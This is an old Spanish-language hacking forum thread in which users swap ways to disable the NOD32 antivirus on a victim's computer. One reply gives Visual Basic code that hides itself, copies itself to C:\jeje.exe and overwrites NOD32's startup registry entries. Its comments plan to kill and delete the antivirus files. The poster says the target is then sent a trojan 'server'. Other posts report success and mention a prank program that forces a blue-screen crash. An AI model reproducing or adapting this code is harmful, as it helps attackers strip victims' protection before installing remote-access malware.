Autor
|
Tema: Killer (Leído 6,329 veces)
|
Sancho.Mazorka
Gamer & Programador
|
|
Re: Killer
« Respuesta #10 en: 28 Mayo 2006, 00:00 am » |
|
hola people! miren yo hice esto para cagar al nod! le cambias el nombre y lo finalizas y listo no se inicia mas! o si no cambien la lalve del registro y listo, cambien cualkiera y el nod se caga y no sirve mas! PD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2 Sancho.Mazorka
|
|
« Última modificación: 28 Mayo 2006, 00:04 am por Sancho.Mazorka »
|
|
|
|
|
Eternal Idol
Kernel coder
Colaborador
Israel nunca torturó niños, ni lo volverá a hacer.
|
|
« Respuesta #11 en: 28 Mayo 2006, 10:40 am » |
|
PD: no me quedo claro lo que hace tu codigo Eternal Idol lo unico que entendi es que te tira el error ese y uqe te hace, te caga la memoria RAM o el disco o solo te asusta el error (osea que tira error pero no hace nada grave) Gracias y salu2 Nada, te reinicia la maquina despues de dar un pantallazo azul; es una broma ese codigo.
|
|
|
|
La economía nunca ha sido libre: o la controla el Estado en beneficio del Pueblo o lo hacen los grandes consorcios en perjuicio de éste. Juan Domingo Perón
|
|
|
rubeng
|
|
« Respuesta #12 en: 28 Mayo 2006, 19:26 pm » |
|
no el nod no vuelve a iniciar pero el proceso nod32krn.exe sigue activo y si abro un troyano o algo me lo bloquea no lo deja ejecutar no dice nada del nod pero no lo deja ejecutar
|
|
|
|
|
|
|
The Shredder
La guitarra,causa y solucion a todos mis problemas
|
|
« Respuesta #13 en: 28 Mayo 2006, 22:46 pm » |
|
weno mi idea es reemplazarnos por la entrada al registro del nod32 y luego la proxima vz q se prenda el pc matar los archivos (q no van a estar en uso hahaha) Private Sub Form_Load() App.TaskVisible = false
If App.PrevInstance then end end if
FileCopy App.ExeName + ".exe" , "c:\jeje"
Set shell = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod krn" , "C:\jeje.exe"
shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\la entrada del nod kui" , "C:\jeje.exe"
If fso.FileExists("C:\windows\the shredder.dll") Then kill 'el nod32krn y el otro, tbn podrias borrarle el uninstall para 'dejar basura en su pc... 'a estas alturas el nod32 ya va a estar muerto xD End Else Open "c:\windows\the shredder.dll" For Output As #1 Print #1, "jejeje, si existo realiza la acción, si no no" Close #1 End End If End Sub
asi al otro dia le mandas el server y hacke mate... salu2
|
|
« Última modificación: 28 Mayo 2006, 22:48 pm por The Shredder »
|
|
pure linux programming...
|
|
|
rubeng
|
|
« Respuesta #14 en: 29 Mayo 2006, 01:46 am » |
|
bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos salu2
|
|
|
|
|
|
|
Gorky
|
|
« Respuesta #15 en: 29 Mayo 2006, 19:24 pm » |
|
bueno ya logre hacerlo gracias a todos en especial a krnl64 que desensamblo el nod32krn y me dijo a que archivos estaba ligado. gracias a todos salu2
Permiteme que ponga en duda que lo haya "desensamblado".
|
|
|
|
|
|
|
Krnl64
Exception 0x00005
|
|
« Respuesta #16 en: 29 Mayo 2006, 19:30 pm » |
|
Gorky, no dudes tanto.
No creas que algo que tu no sepas hacer sea imposible.
Salu2
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |